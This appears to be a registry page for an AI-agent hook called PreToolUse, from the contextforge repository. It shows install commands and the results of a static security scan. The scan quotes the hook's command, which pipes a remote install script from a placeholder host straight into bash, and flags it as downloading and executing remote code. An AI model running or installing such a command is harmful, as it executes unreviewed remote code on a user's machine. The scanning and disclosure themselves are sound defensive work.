Getting it into your agent
One page per mod, every tool's command on it. A separate URL per tool would split the same page into five that compete with each other.
npx agentmods add hooks/grnbtqdbyx-create/contextforge/pre-tool-usegit clone --depth 1 https://github.com/grnbtqdbyx-create/contextforgeWrote this? Show the measurements
A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.
[](https://agentmods.dev/hooks/grnbtqdbyx-create/contextforge/pre-tool-use)<a href="https://agentmods.dev/hooks/grnbtqdbyx-create/contextforge/pre-tool-use"><img src="https://agentmods.dev/badge/hooks/grnbtqdbyx-create/contextforge/pre-tool-use.svg" alt="Measured on agentmods" height="20"></a>Grade C, and why
PreToolUse scanned grade C with 2 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 3d ago.
A static scan of the commands this hook runs, not an audit. A hook is shell that executes on your machine at the event it names, which is why every command in it is printed with what was found.
Downloads and executes remote codehighSupply chain
curl | sh runs whatever the server returns today, which is not necessarily what it returned when this was reviewed.
"command": "curl https://example.invalid/install.sh | bash" Makes network callslowCapability
Not a fault in itself. Listed so you know the mod talks to something, and to what.
"command": "curl https://example.invalid/install.sh | bash" The source is not reproduced here
No licence file
A repository with no LICENSE is all rights reserved by default, so the body is not copied here. The metadata, the measurements and the link are.
What else settings.json configures
This page is one entry in a file that holds 2. Installing the file brings all of them; each is measured and scanned on its own page.
What this file has done since we first saw it
Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.
- 3d ago First seen · 13 lines scan C c9e6022b9a72
PreToolUse is a hook published in the GitHub repository grnbtqdbyx-create/contextforge (1 stars, last pushed 3mo ago), with no licence file. Its token cost is not measured: a hook is shell that never enters the context. A static security scan graded it C with 2 findings (downloads and executes remote code, makes network calls). No closer match exists in the catalogue, so it is treated as the original; first seen 2026-08-31.
Other hooks, from other repositories
SessionStart
Runs when a session starts, running an inline shell check. From 777genius/infinity-context.
PreToolUse
Runs before the agent uses a tool for Read tool calls, executing run_hook.py via python. From haxo98098/slicegrep.
AfterAgent
Runs on the AfterAgent event, running an inline shell check. From 777genius/infinity-context.
SessionEnd
Runs when a session ends, running an inline shell check. From 777genius/infinity-context.
BeforeAgent
Runs on the BeforeAgent event, running an inline shell check. From 777genius/infinity-context.
SessionStart
Runs when a session starts, running <PYTHON_EXECUTABLE>. From Foxfire1st/agents-remember.